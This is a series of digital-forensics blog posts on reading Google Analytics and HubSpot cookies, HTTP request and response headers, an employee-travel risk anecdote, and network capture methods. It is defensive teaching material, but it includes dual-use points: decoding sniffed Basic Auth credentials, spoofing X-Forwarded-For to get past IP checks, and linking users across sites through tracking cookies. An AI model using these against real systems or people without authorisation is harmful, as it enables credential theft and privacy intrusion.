
- Digging into Google Analytics & HubSpot Cookies for Forensics
You know how Google seems to know what you were thinking before you even typed it? That's not magic—it's analytics. Google Analytics and marketing tools like HubSpot leave behind tracking cookies on devices, and guess what? These aren't just marketing gold—they're digital breadcrumbs that we, as forensic investigators, can use to understand a user's activity. Let's break this down like we're sitting together at a DFIR roundtable.

So, What Are These Cookies and Why Do We Care?

Google Analytics sets a bunch of cookies that track a user's interaction with a website. While this helps advertisers figure out where users are coming from and what they do on the site, it also helps us in incident response and digital forensics. The main players in Google's tracking cookie lineup are:

__utma
__utmb
__utmz

(And a few others like __utmc and __utmt... but let's keep our eye on the forensic prize.)

These cookies are part of what used to be called the Urchin Tracking Module (UTM)—technology Google acquired back in 2005.

Dissecting the __utma Cookie

This one's a long-liver—with a 2-year expiration date—and super valuable for us. It tells a detailed story about the user's visits to a site. Here's the format:

__utma=<domain hash>.<visitor ID>.<first visit>.<previous visit>.<current visit>.<visit count>

Example:
__utma=57409013.9999999999.1600000000.1700000000.1710000000.10

Translation:
57409013: domain hash (stays the same for the same domain)
9999999999: unique visitor ID (a random long number)
1600000000: first visit (Unix timestamp, ~2020)
1700000000: previous visit (Unix timestamp, ~2023)
1710000000: current visit (Unix timestamp, ~2024)
10: visit count—this user has visited 10 times

Why this matters: this gives us a timeline for a user across visits and helps identify repeat behavior. Just keep in mind—different browsers, private mode, or cookie clearing resets this data, so multiple values can exist for the same human.

Meet __utmb: The Session Timer

This one's short-lived—just 30 minutes! It's all about tracking sessions.

__utmb=<domain hash>.<pages viewed this session>.<outbound-link token>.<session start time>

Example:
__utmb=57409013.1.10.1720000000

If a user clicks a phishing link, for example, and it triggers some malicious activity, this cookie might help us zero in on when that session started.

Meet __utmz: The User's Path

Think of this one as the referral detective. It lasts 6 months and shows how the user landed on the site.

__utmz=<domain hash>.<timestamp>.<session count>.<source count>.<campaign data>

Example:
__utmz=57409013.1349969023.3.2.utmcsr=rss1.0mainlinkanon|utmccn=...
or
__utmz=57409013.1746076800.4.3.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=buy%20headphones|utmcct=/

Breaking down that second example:
57409013 = domain hash (same domain as above)
1746076800 = timestamp for May 1, 2025
4 = the user's 4th visit
3 = their 3rd different traffic source
utmcsr=google = source: Google
utmccn=(organic) = campaign: organic search
utmcmd=organic = medium: organic (vs. referral or direct)
utmctr=buy headphones = search keyword
utmcct=/ = landed on the homepage

Why it's useful: if you're investigating malware that was delivered via a malvertising campaign or a specific site, this helps reconstruct the user's path.
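Converting those epoch values by hand gets tedious fast. Here's a minimal Python sketch that splits a __utma value into readable fields (the layout follows the breakdown above; the same idea works for HubSpot's __hstc below, except its timestamps are in milliseconds, so divide by 1,000 first):

from datetime import datetime, timezone

def parse_utma(value):
    # Six dot-separated fields, as described in the breakdown above
    domain_hash, visitor_id, first, prev, curr, count = value.split(".")
    ts = lambda t: datetime.fromtimestamp(int(t), tz=timezone.utc)
    return {
        "domain_hash": domain_hash,
        "visitor_id": visitor_id,
        "first_visit": ts(first),
        "previous_visit": ts(prev),
        "current_visit": ts(curr),
        "visit_count": int(count),
    }

print(parse_utma("57409013.9999999999.1600000000.1700000000.1710000000.10"))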
------------------------------------------------------------------------------------------------------------

Beyond Google: HubSpot Cookies Are Forensic Gold Too

Alright, so not every site uses Google Analytics. Some go with tools like HubSpot, especially in marketing-heavy environments. The key HubSpot cookies:

__hstc
hubspotutk
hsfirstvisit

Meet __hstc: HubSpot's Main Tracker

This one sticks around for 2 years and tracks repeat visits:

__hstc=<domain hash>.<visitor ID>.<first visit>.<previous visit>.<current visit>.<visit count>

Example:
__hstc=104275039.abc1234567890abcdef9876543210abcd.1704067200000.1743465600000.1748649600000.5

You've got:
Domain hash: 104275039 — a numeric identifier for the domain, hashed internally by HubSpot.
Visitor ID: abc1234567890abcdef9876543210abcd — a unique ID for the visitor (it looks like an MD5 hash), used to identify return visits from the same browser/device.
First visit: 1704067200000 — Unix milliseconds, corresponding to Jan 1, 2024. Marks the first time this user visited the site.
Previous visit: 1743465600000 — corresponds to April 1, 2025. Marks the second-most-recent visit.
Current visit: 1748649600000 — corresponds to May 31, 2025. Marks the current visit.
Visit count: 5 — this is the visitor's 5th visit to the site.

Forensics win: these values give us insight into visit behavior across time, just like Google Analytics, but from a different provider—one that might not be blocked or deleted as often.

hubspotutk: The Long-Lived Fingerprinter

This one is wild—it's valid for 10 years. Even though its internal structure isn't documented, this unique value can help us correlate activities across visits and sessions. If we find the same hubspotutk value in cookies across different websites, we may be able to link activity to the same user device.

hsfirstvisit: First Contact

Also has a 10-year expiration. It shows:
How the user got to the site on their first visit
A long Unix-style timestamp in milliseconds (just chop off the last 3 digits to convert)

Example: a value of 1672574400000 becomes 1672574400, which converts to:
$ date -u -d @1672574400
Sun Jan  1 12:00:00 UTC 2023

This might tie the user's first visit to a job posting or email link—even if the page is no longer online.

------------------------------------------------------------------------------------------------------------

Why This Matters in Investigations

These tracking cookies can:
Help build timelines of activity
Correlate a device/user across domains
Identify the entry point in phishing or exploit delivery
Highlight repeat behavior or anomalous browsing

But remember:
They're browser- and session-specific
Private mode or cookie clearing wipes them
Different browsers = different cookie stores

So always combine them with browser history, cache, web artifacts, and tools like:
Plaso/log2timeline
Browser History Capturer
KAPE with browser modules

------------------------------------------------------------------------------------------------------------

Wrapping Up

Tracking cookies like __utma, __utmz, and __hstc are often overlooked in forensic investigations. But when interpreted correctly, they provide valuable context that complements log files and system artifacts. So next time you're staring at a blob of cookie data, take a closer look—it might just lead you to a breakthrough in your case.

-----------------------------------------Dean-----------------------------------------------
- Let's Talk About HTTP – The Backbone of the Web (And a Goldmine for DFIR Folks)
---------------------------------------------------------------------------------------------------

Thanks for all the support on the Wireshark article! https://www.cyberengage.org/post/master-wireshark-tool-like-a-pro-the-ultimate-packet-analysis-guide-for-real-world-analysts

I know there are already tons of articles out there on HTTP—but trust me, this one's different. Give it a read, and you'll see exactly what I mean.

---------------------------------------------------------------------------------------------------

Hey folks! Today, let's take a walk through a protocol that all of us use literally every day—HTTP. Yup, HyperText Transfer Protocol. Even if you're not a hardcore networking nerd, if you've ever opened a webpage (which, hello, you're doing now!), you've used HTTP.

But if you're into digital forensics, incident response, or just cybersecurity in general, knowing how HTTP works isn't just a bonus—it's critical. And trust me, there's a lot more to it than just "the thing that gives me web pages."

------------------------------------------------------------------------------------------------------------

First Things First: What Is HTTP?

HTTP is a plaintext protocol, which means it's readable. You and I can literally look at a packet of HTTP data and figure out what's going on without needing fancy tools. It's also stateless, meaning each request doesn't remember the one before it. Every request stands on its own.

This might sound weird at first—like, how does your web browser remember where you left off? That's where cookies, sessions, and tokens come in (topics for another day 😄).

------------------------------------------------------------------------------------------------------------

Why Should a Forensic Investigator or Incident Responder Care?

I'm glad you asked 😎 Whether you're investigating a rogue employee, a full-blown APT, or just checking someone's shady web browsing, HTTP is going to show up a lot. In fact, you'll probably run into HTTP traffic in almost every case.

Now, here's the twist: with the rise of full-disk encryption, incognito modes, and BYOD (bring-your-own-device) policies, disk artifacts aren't always enough. That's where network data comes in. If you've got packet captures (PCAPs) available, you can:

Reconstruct entire web sessions
Pull down files that were downloaded (think: malware EXEs or phishing pages)
Track API calls to remote services
Monitor machine-to-machine activity (bots, implants, or automated tools)
Detect C2 (command & control) traffic

And that's not just theory. I've worked with many malware analysts who help us dissect C2 channels running over HTTP. Even if the attacker encrypted the payload, the URLs, headers, or timing patterns can still tell you a lot.

------------------------------------------------------------------------------------------------------------

Real-Life Use Case: Web Server Compromise

Let's say a web server gets popped. Sure, you'll look at logs and disk evidence. But what if the attacker cleared logs or used living-off-the-land techniques? That's when HTTP traffic analysis becomes your best friend. By reviewing actual network traffic, you might catch:

File uploads via POST
Command injections
Suspicious API usage
Attacker beacons to external servers

------------------------------------------------------------------------------------------------------------

HTTP Versions – It's Not All 1.1!

Okay, here's a little version history in plain English:

HTTP/1.0 – Old-school. One request per connection.
HTTP/1.1 – Still widely used. Keeps connections alive. This is what you'll see most in PCAPs.
HTTP/2 – Multiplexed. Multiple requests over one connection. Super common now.
HTTP/3 – The future. Built on QUIC (based on UDP), not TCP. Crazy fast. Still being adopted.

According to W3Techs (as of this writing), HTTP/2 is used by over 50% of websites, and HTTP/3 is slowly gaining ground (~10% but growing fast).

------------------------------------------------------------------------------------------------------------

Dissecting an HTTP Request – Let's Get Nerdy for a Second

Here's a simple GET request:

GET /time/1/current?cup2key=9:wz8PuwCb6IQ1sPJTx92bCpndCnsugtTLkdpVppulvZE&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 HTTP/1.1\r\n
Host: clients2.google.com

The request line breaks down into:

GET – the request method
/time/1/current?cup2key=...&cup2hreq=... – the URI (Uniform Resource Identifier), including the query string
HTTP/1.1 – the protocol version

Then you've got headers (like Host, User-Agent, Accept, etc.).

Fun fact: GET and POST are the most common methods. GET is used to fetch data. POST is used to send data (like login credentials, form data, or file uploads).

Here's a quick cheat sheet of other methods:

HEAD – Like GET, but fetches only headers (no body)
PUT – Uploads a file or resource
DELETE – Deletes a resource
OPTIONS – Asks what methods the server supports
TRACE – Echoes back the request (used for debugging)
CONNECT – Creates a tunnel, often for HTTPS

Some of these, like TRACE and CONNECT, are often blocked by firewalls or disabled on servers because of their potential for abuse.

------------------------------------------------------------------------------------------------------------

Forensic Tips & Bonus Nuggets

HTTP requests can contain query strings (?name=value&foo=bar), which might hold sensitive search terms, login attempts, or injection payloads (see the sketch below).
Headers like User-Agent, Referer, and Cookie can reveal browser behavior, session IDs, and possible spoofing.
When malware uses HTTP as a C2 channel, it often mimics legitimate browser behavior to blend in. Look for anomalies!
Some HTTP-based malware also abuses API endpoints, like /api/upload, /checkin, or /status. These are usually dead giveaways in custom C2 protocols.

One Last Thing...

Not all HTTP traffic is visible today. With HTTPS (the secure version), a lot of the content is encrypted. But don't worry—the domain (SNI), headers, and timing can still tell you a lot, especially if you're using TLS interception (in legal environments, of course).
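Since query strings carry so much of the interesting evidence, here's a minimal Python sketch for pulling one apart with the standard library (the URI is an illustrative example, not from the capture above):

from urllib.parse import urlsplit, parse_qs

uri = "/search?q=buy+headphones&session=abc123"  # illustrative URI from a log or pcap
parts = urlsplit(uri)
print(parts.path)             # /search
print(parse_qs(parts.query))  # {'q': ['buy headphones'], 'session': ['abc123']}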
------------------------------------------------------------------------------------------------------------

Now let's casually break down something that often looks boring but is super powerful when you're into digital forensics, incident response, or even threat hunting—HTTP request headers.

What's the Scene?

Imagine someone visited metadrive.io. When they did that, their browser quietly made an HTTP request to metadrive.io. What's interesting is how their browser told the website about itself—and that's where headers come in.

Let's start with the raw request:

GET / HTTP/1.1\r\n
Host: metadrive.io\r\n
Connection: keep-alive\r\n
Upgrade-Insecure-Requests: 1\r\n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\n
Accept-Encoding: gzip, deflate\r\n
Accept-Language: en-US,en;q=0.9\r\n
\r\n

------------------------------------------------------------------------------------------------------------

Okay, deep breath!

Host Header – The MVP of HTTP/1.1

Host: metadrive.io\r\n

Why it matters: in HTTP/1.1, the Host header is required. Without it, the server won't know which website you want—especially important when one server hosts multiple sites. Think of it as the "to:" address on a letter.

------------------------------------------------------------------------------------------------------------

User-Agent – Browser's ID Card (Well, Sort Of)

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36\r\n

What it tells us: this is your browser bragging about who it is. In this case, the browser identifies as Chrome 136 on Windows 10 (64-bit).

Now here's the kicker: this value is completely customizable. Anyone can spoof it. You and I can literally install browser extensions like User-Agent Switcher and pretend to be Googlebot, Internet Explorer from 2001, or even a toaster (okay, maybe not—but close!).

------------------------------------------------------------------------------------------------------------

Accept Headers – What the Client Wants

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,...\r\n
Accept-Encoding: gzip, deflate\r\n
Accept-Language: en-US,en;q=0.9\r\n

These are pretty straightforward:

Accept: what content types the browser can handle (HTML, XML, etc.)
Accept-Language: tells the server the user's preferred languages. Useful for geo-profiling.
Accept-Encoding: whether the browser can handle compressed responses like gzip.

Also, note the q value—it shows preference. For instance, q=0.9 means "I like XML, but not as much as plain HTML."

------------------------------------------------------------------------------------------------------------

Cookies – The Trail of Breadcrumbs

(This header isn't present in the example above, but I'm adding one so it's easier to follow.)

Cookie: prov=...; hubspotutk=...; docs_hero=x; hero=none

prov=... – likely a session or user identification token
hubspotutk=... – a HubSpot tracking cookie used for analytics and form submissions
docs_hero=x – possibly a custom flag to track a docs page UI state
hero=none – another UI state flag or feature toggle

Cookies are little pieces of data stored by your browser for websites. They're often used to maintain state—which is important because HTTP itself is stateless. Without cookies, every click would feel like starting from scratch.

Types of cookies:
Session cookies: gone when the browser closes.
Persistent cookies: stick around until they expire (or you delete them).

For us forensic folks, cookies can reveal:
Logins
Tracking IDs
User behavior across sessions

You'd be surprised how much we can correlate just from cookie IDs.
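If you're scripting this, Python's standard library will split a raw Cookie header for you. A minimal sketch (the cookie values are placeholders, since the real ones were truncated above):

from http.cookies import SimpleCookie

raw = "prov=PLACEHOLDER-TOKEN; hubspotutk=PLACEHOLDER-UTK; docs_hero=x; hero=none"
cookie = SimpleCookie()
cookie.load(raw)
for name, morsel in cookie.items():
    print(name, "=", morsel.value)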
------------------------------------------------------------------------------------------------------------

Authorization – Base64 and Secrets

Authorization: Basic <base64 credentials>

Example:
Authorization: Basic bmV3dXNlcjpzM2NyM3RwYXNz

Here's where you might find credentials. This is Basic Auth, and it's basically (pun intended) the Base64 encoding of username:password. So bmV3dXNlcjpzM2NyM3RwYXNz decodes to newuser:s3cr3tpass (there's a one-line decode in the sketch after this headers tour).

Modern sites mostly use token-based auth or OAuth, but for internal apps or older services, you still find Basic Auth. When found, it's gold for an attacker or an investigator.

------------------------------------------------------------------------------------------------------------

X-Forwarded-For – Tracing Real IPs (Kinda)

X-Forwarded-For: <client IP>, <proxy IP>

If a request passes through proxies, this header might show the original client IP. BUT, it's easily spoofed. An attacker can just add their own X-Forwarded-For and pretend to come from anywhere (say, an internal IP like 192.168.1.11). Some servers trust this blindly—not good. That's why this header is a common target in IP-based bypasses.

------------------------------------------------------------------------------------------------------------

Proxy-Authorization – Auth to Use the Proxy

Proxy-Authorization: Basic bmV3dXNlcjpzM2NyM3RwYXNz

Like Authorization, but used when a client needs to authenticate to a proxy server. Again, Base64—same risks apply.

------------------------------------------------------------------------------------------------------------

Referer (Yeah, It's Misspelled) – Where You Came From

Referer: https://www.cyberengage.org/search?q=forensic

This tells the server which page you clicked from. Handy for:

Analytics (e.g., "what drove traffic here?")
Security (e.g., detecting CSRF or phishing flows)
Investigation (e.g., mapping user navigation paths)

Here's the cool part: if you're moving from HTTPS → HTTP, browsers are supposed to suppress or truncate this header. But in practice, some browsers still leak enough info to tell where you came from.

------------------------------------------------------------------------------------------------------------

Other Fun Headers

Upgrade-Insecure-Requests: 1 → tells the server "hey, if you support HTTPS, switch me there."
Cache-Control: max-age=0 → basically says: "Please don't serve me a cached page; I want it fresh."
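As promised, decoding a Basic Auth blob takes one line of Python—a quick sketch using the example value above:

import base64

blob = "bmV3dXNlcjpzM2NyM3RwYXNz"  # from the Authorization: Basic header above
print(base64.b64decode(blob).decode())  # newuser:s3cr3tpass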
------------------------------------------------------------------------------------------------------------

Dissecting an HTTP Response – Let's Get Nerdy for a Second

So far, we've talked a lot about HTTP requests—what the client sends to the server. But now it's time to flip the script. Let's talk about what the server sends back in response.

Let's Start from the Top — the Status Line

Here's a classic example:

HTTP/1.1 200 OK

This single line tells you three key things:

Protocol version: HTTP/1.1 — this should match the client's request version.
Status code: 200 — tells you if the request went okay or something broke.
Status text: OK — human-readable, but the client doesn't really care what this says. It could say "Success", "All Good", or even "Nice Try Buddy" 😄 — as long as the number is 200, the meaning is the same.

💡 Common Status Codes You Should Know

Let me list a few real-world ones we bump into all the time:

100 Continue – client can keep sending the request body
200 OK – everything's good
301 Moved Permanently – resource has a new home
302 Found – temporary redirect
304 Not Modified – client's cached copy is still good
400 Bad Request – syntax error from the client
401 Unauthorized – authentication needed
403 Forbidden – you don't have permission
404 Not Found – resource doesn't exist
407 Proxy Auth Required – you need to authenticate via the proxy
500 Internal Server Error – oops, something's broken
503 Service Unavailable – overload or maintenance
511 Network Auth Required – seen in public Wi-Fi portals

For threat hunters: seeing lots of 400s from the same IP? That might be scanning/recon. A sudden switch from 500s to 200s during POST requests? Could be SQL injection, where the server backend choked on bad input before the attacker got it right.

🔍 Real Response Header Breakdown

Here's a full sample response:

accept-ranges: bytes\r\n
content-disposition: attachment\r\n
content-length: 1963\r\n
content-security-policy: default-src 'none'\r\n
server: Google-Edge-Cache\r\n
x-content-type-options: nosniff\r\n
x-frame-options: SAMEORIGIN\r\n
x-xss-protection: 0\r\n
x-request-id: c1349dbe-bb51-41bc-a142-e4ba95d94a1c\r\n
date: Sat, 24 May 2025 04:26:33 GMT\r\n
age: 38934\r\n
last-modified: Sat, 24 May 2025 04:24:20 GMT\r\n
etag: "45281ea"\r\n
content-type: application/octet-stream\r\n
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000\r\n
cache-control: public,max-age=86400\r\n
coprocessor-response: download-server\r\n
\r\n

Now let's decode it like detectives 🕵️:

Cache-Control, Expires, and ETag

These tell you how caching should work.

Cache-Control: private — only the user's browser should cache it, not shared proxies. (If you see Cache-Control: public, the response is cacheable by any cache—the user's browser and shared caches alike.)
Expires: <date> — when the cached copy is no longer valid. Alternatively, max-age=86400 means it remains fresh and reusable for one day.
ETag: "<fingerprint>" — a unique fingerprint for the content; helps determine whether the content changed.

Great for web performance and forensic timeline building.

Content-Type and Content-Encoding

These tell you what kind of content you got and how it's packed:

Content-Type: text/html; charset=utf-8 — an HTML page in UTF-8 encoding. In our sample, content-type: application/octet-stream tells the browser (or any client) that the server is sending raw binary data.
Content-Encoding: gzip — it's compressed, so your client needs to decompress it.

Content-Length

Size of the actual data (after decompressing, if needed). Here, content-length: 1963 means 1,963 bytes.

X-Frame-Options: SAMEORIGIN

Mitigates clickjacking by saying: "Only I can frame myself!"

Date

The exact time the response was generated. Useful when reconstructing timelines or tracking malware behavior.

date: Sat, 24 May 2025 04:26:33 GMT

Investigator tip: if your endpoint says it made the request at 1:52 PM, but the server's timestamp says it responded at 1:47 PM—you might have clock skew on the client. This can seriously mess with your timeline, so always cross-check time sources.

Fun fact: some malware variants use this Date: header as a seed value for their DGA (Domain Generation Algorithm)—clever, huh?
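Comparing a server's Date header against endpoint timestamps is easier in code. A minimal Python sketch (the client-side time is hypothetical, e.g. pulled from endpoint logs):

from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

server_time = parsedate_to_datetime("Sat, 24 May 2025 04:26:33 GMT")
client_time = datetime(2025, 5, 24, 4, 31, 33, tzinfo=timezone.utc)  # hypothetical endpoint log time
print("apparent clock skew:", client_time - server_time)  # apparent clock skew: 0:05:00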
Connection: keep-alive (If Found)

With HTTP/1.1, one of the cool upgrades was allowing persistent connections—so your browser could reuse the same TCP session for multiple requests. This reduces overhead and speeds things up.

The client tells the server it supports this using: Connection: Keep-Alive
If the server agrees, it responds with: Connection: Keep-Alive
But if either side wants to close the connection: Connection: close

Investigator tip: if you're monitoring traffic and notice lots of "Connection: close" lines mid-session, it might indicate non-browser activity—like malware making single-use requests.

------------------------------------------------------------------------------------------------------------

What About Redirects?

Redirections are handled via a combination of:

A 300-series status code (like 301 or 302)
A Location: header that says: "Hey, go here instead!"

These redirects can be abused too. Malware campaigns use redirect chains to mask the origin of malicious content. Forensics tip: don't stop at the first hop!

------------------------------------------------------------------------------------------------------------

Pro Tip: Watch Out for X- Headers

Both clients and servers can use custom headers that begin with X-. These can carry unique identifiers, debug info, or even tracking tokens.

Example: X-Request-Guid: <GUID> — this might help correlate a single session across multiple logs.

------------------------------------------------------------------------------------------------------------

HTTP Headers in Investigations

Let's talk real-world usage. How do these headers help during an actual incident?

1. Pastebin & Data Exfil
Attackers often use public paste sites like Pastebin or SendSpace. Some malware is coded to automatically upload exfiltrated data using these services' APIs. If an attacker has RDP or VNC access, they might just open a browser and do it manually—but the network traffic (HTTP POST requests, User-Agent headers, and API URIs) will still leave footprints.

2. User-Agent Fingerprinting
If you're in a corporate environment, there's probably a known set of legitimate User-Agent strings. Anything else? Could be:
Malware
An unauthorized browser
Portable or dev tools
Sometimes, malware adds its own version string to the User-Agent, helping investigators quickly fingerprint infections across the environment.

3. Credential Sniffing in HTTP Basic Auth
We touched on this earlier, but just a reminder—Basic Auth sends credentials like this:
Authorization: Basic bmV3dXNlcjpzM2NyM3RwYXNz
That Base64 string? It's just user:password. If you're capturing traffic, you can extract credentials directly.

4. URI Analysis
Every URI tells a story. It could be:
Web searches
Form submissions
API calls
Malware callbacks
Pairing URI analysis with malware analysis gives you powerful insight into what the attacker was trying to do—exfiltrate data, move laterally, connect to command-and-control, or worse.

5. When the Disk Fails, the Network Tells All
Modern attackers are smart:
They use private browsing
They run portable apps from USBs
They clean up after themselves
So maybe there's no trace left on the disk. But network traffic? That's harder to erase. If you have PCAPs or proxy logs, you've still got a shot.

------------------------------------------------------------------------------------------------------------

Final Thoughts

HTTP headers might seem boring on the surface, but when you dig in—they're loaded with useful info. From persistent connections to User-Agent strings to caching behavior and time syncing—every bit tells you something. I hope this post made it easier to see headers not as noise, but as gold dust for a forensic investigator.
-------------------------------------------------------Dean-------------------------------------------
- The Silent Journey: A Cautionary Tale in Cyber Risk
By Dean and Co-founder (keeping him hidden)

Note: The following is a real-world scenario. While specific details have been redacted for confidentiality, the events, risks, and discussions are authentic and reflect how quickly routine security assumptions can be challenged.

-------------------------------------------------------------------------------------------------------------

It was a quiet Friday afternoon when the security team at <Redacted> received a cryptic message that disrupted the stillness:

"Just letting you know, I'm traveling to [Redacted: High-Risk Country] for a personal emergency. I have my work laptop with me, but it's off. I won't be working remotely. I'll be back in a few days."

No warning. No travel notice. No security protocol followed.

The sender was a mid-level employee—someone with access to sensitive communication channels, confidential project documentation, and internal corporate emails. She had simply vanished off the radar with a company-owned device, now located in one of the most surveilled and cyber-hostile environments on Earth.

When Silence Isn't Golden

As the message trickled up the chain of command, tension rippled through the team. The endpoint hadn't checked in. The MDM system showed it as silent. Meanwhile, her personal phone, likely still logged into apps like Slack and Gmail, was live—connected to unknown, unmanaged, and potentially compromised networks.

The war room lit up. Discussions intensified. The air was heavy with the weight of unknowns. That's when the Manager, a cybersecurity veteran, finally spoke up—measured and calm:

"Hi @Co-founder. Should we burn it all down?"

Experience Speaks

The Co-founder leaned back in his chair, gaze steady.

"Unless you suspect she's actively cooperating with the [foreign] government, I don't think you need to go nuclear. If FileVault is enabled and she confirms that the laptop never left her possession, we have some room for a measured response."

His suggestion? Don't jump to a full device wipe—yet. Instead, perform deep threat hunting when the laptop returns. Maybe even plant deception tokens to monitor post-return behavior.

But then his tone shifted. And the room fell silent.

"I've seen this before. A national from [REDACTED] traveled back home. He was coerced. Pressured. When he returned, credentials started behaving strangely. It turned out the government had leaned on him to gain access to his employer's network. But that was a high-profile case—the company had crossed a geopolitical red line."

When to Go Nuclear

The Co-founder then delivered a dose of hard-earned wisdom:

"Governments don't waste zero-days lightly. A full-disk encryption bypass? That's a weapon-grade exploit. If the device wasn't seized or out of her hands, I'd avoid assuming the worst."

However, he outlined a clear response matrix:

If customs had taken the device, even briefly? → Immediate wipe. No debate.
If there's no evidence of tampering and the device remained in her possession? → "Wipe sessions. Reset MFA. Change passwords. Hunt hard."
If you suspect cooperation or physical compromise? → "Wipe everything. Treat it like a breach."

The Measured Middle Ground

His conclusion struck a balance between paranoia and practicality:

"I wouldn't make this the standard response to all international travel. But this? This is how I'd handle it. If wiping the device won't cause operational disruption, then sure—wipe it.
Better safe than sorry."

The team sat in silence again, eyes fixed on the last known signal from the laptop—thousands of miles away. Powered off… or so she said.

The Return Is Still Days Away

And so the countdown begins. An employee returns soon. But what is she really bringing back? That's the question no one can yet answer. A trusted colleague? A compromised asset? Or a sleeper breach waiting to unfold?

Stay vigilant. Because sometimes, the quietest events… hide the loudest risks.
- Where Do We Begin? A Network Forensic Investigator’s Steps
This is a forensic-mindset article. Let's be honest—when you're knee-deep in a digital forensic investigation or a threat hunting session, one of the biggest challenges is simply knowing where to start.

Sometimes you're lucky. You get a nice clean lead: a suspicious IP, a malware hash, or a user who clicked something shady. But more often than not, someone just comes over and drops the classic: "Something's off… we don't know what, but can you check it out?"

Frustrating, right? But this is actually where the real DFIR (Digital Forensics and Incident Response) journey begins.

-------------------------------------------------------------------------------------------------------------

The Investigative Compass: Ask the Right Questions

Here's what helps me frame my approach—and you might find this helpful too:

1. What was taken? When? Where did it go? How? Who?
Classic damage assessment. This is what most stakeholders care about. What data was stolen? When did it happen? Is it still happening? "Who did it" isn't always the most urgent priority.

2. What happened just before and after the incident?
Events don't happen in a vacuum. Context is king. A login from a foreign IP five minutes before the ransomware hit? That matters. Random account creation after an attachment was opened? That's a clue. Sometimes the thing you're investigating is just the tip of the iceberg. Looking at the surrounding activity is how you find the rest of it.

3. How did the malware get in?
Was it a phishing email? A drive-by download from a shady ad network? A vulnerable web server? You'll often find these answers in your network logs or proxy data. Knowing how the threat entered helps you close that door and stop the same thing from happening again.

4. What else was happening on the network?
This is about scoping. Are there other compromised systems? Is there lateral movement? This is where real hunting begins. A good rule of thumb: if one system is infected, chances are it's not alone.

-------------------------------------------------------------------------------------------------------------

The Most Common Entry Point: Phishing (Yeah, Still)

Let's walk through an all-too-familiar story:

User connects to the corporate Wi-Fi.
Logs into their domain account.
Opens Outlook.
Sees an email—looks legit.
Clicks a link. Boom. Game over.

Here's what actually happens under the hood:

DNS request to the phishing domain.
Website serves a drive-by download.
User unknowingly runs the payload.
It fetches a second-stage malware.
Tries connecting to the primary C2—blocked.
Falls back to the backup C2—success.

This tiny click becomes a pivot point for an entire compromise. Knowing the order of operations helps you know exactly what to look for in logs and network traffic.

-------------------------------------------------------------------------------------------------------------

Packet Captures (pcaps): Goldmine or Nightmare?

If you've worked with network data, you've seen .pcap files. These are generated by tools like tcpdump, Wireshark, or Npcap (on Windows). But let's get real—just having a pcap isn't enough. You've got to ask:

What interface did the capture come from?
Was it a WLAN in managed mode (data frames only)? Or monitor mode (more detailed 802.11 frames)?

Knowing how and where the pcap was captured can save you hours of chasing false leads. Also, pcaps are heavy. On high-bandwidth networks, they can get out of hand quickly—moving them, parsing them, even opening them can be painful.
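When a pcap does land on your desk, a quick scripted triage pass can tell you whether it's even worth opening in a GUI. A minimal sketch using Scapy (a third-party Python library; the filename is illustrative, and rdpcap loads the whole file into memory, so keep this for small captures):

from collections import Counter
from scapy.all import rdpcap, IP  # pip install scapy

packets = rdpcap("suspicious.pcap")
talkers = Counter((p[IP].src, p[IP].dst) for p in packets if IP in p)
for (src, dst), count in talkers.most_common(10):  # top 10 conversations by packet count
    print(f"{src} -> {dst}: {count} packets")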
-------------------------------------------------------------------------------------------------------------

NetFlow & IPFIX: Metadata Magic

If you can't get full packet captures (because... storage), the next best thing is NetFlow or IPFIX. These are like traffic summaries—you won't see payloads, but you will see what talked to what, when, and how much.

Cisco started it. IPFIX is the open standard. Collectors store the data; analysts query it. It's best used on large networks where full captures are impractical. For example: if you see 1,000 connections from an IoT device to an outside IP on port 443... yeah, something's weird.

-------------------------------------------------------------------------------------------------------------

Logs: Trust, but Verify

Logs are amazing, but only if you:

Hash them the moment you collect them.
Store the originals in read-only storage.
Work only on trimmed-down copies.
Label edits and don't overwrite the originals.

Also, retention matters. Sometimes breaches stay hidden for months. If you're only keeping logs for 30 days, that's not good enough. A good practice? Match your log retention to your threat landscape—at least a year for critical servers.

-------------------------------------------------------------------------------------------------------------

Scoping: What Else Was Happening?

After finding malware or a breach, don't stop there. Ask:

Were other systems affected?
Is this lateral movement?
Is the malware beaconing out?

This process—scoping—is crucial. Think of it like a crime scene investigation: don't just look at the body, look at the entire room.

-------------------------------------------------------------------------------------------------------------

Now let's slow down and talk about something we often take for granted: how we actually get the traffic in the first place. We usually get excited about libpcap, tcpdump, and Suricata rules (yes, guilty here 🙋‍♂️), but without the right hardware setup, those tools are like a car without wheels.

First Stop: The Humble Switch (And Port Mirroring)

Let's start with the network switch. These little workhorses make sure devices talk to the right destinations by segmenting traffic. Great for performance—but bad for traffic visibility. On a switched network, we can't just plug into a random port and expect to see all the traffic. Switches are too smart for that.

This is where port mirroring comes to the rescue! It's also known as a SPAN port (Switch Port Analyzer). Here's how it works:

The switch duplicates traffic from one or more ports (or even VLANs).
It sends that duplicate stream to a specific port you designate.
You plug your capture box or sensor into that mirrored port, and boom—you're now watching the action.

Why it's awesome:
Already built into most enterprise switches.
Zero hardware cost (just configuration).
No need to interrupt the network.

But there's a catch: the mirrored port might choke if you throw too much data at it. Even if the switch supports 24 ports at 1 Gbps, your SPAN port is still just one 1 Gbps link. If traffic exceeds what the mirror port can handle, it can drop packets—or worse, the switch might disable the mirror completely.

-------------------------------------------------------------------------------------------------------------

🛠️ Enter the Network TAP: Built for One Job, and It Nails It

When port mirroring isn't cutting it, we turn to the network TAP. These are hardware devices designed solely to duplicate network traffic.
No bells, no whistles—just glorious packets.

Different types of TAPs:

Basic TAPs – Split the traffic into two directions (ingress and egress). You'll need to reassemble them (called aggregation) using software or another device.
Aggregation TAPs – Combine both directions into one full-duplex stream—super handy for monitoring from a single interface.
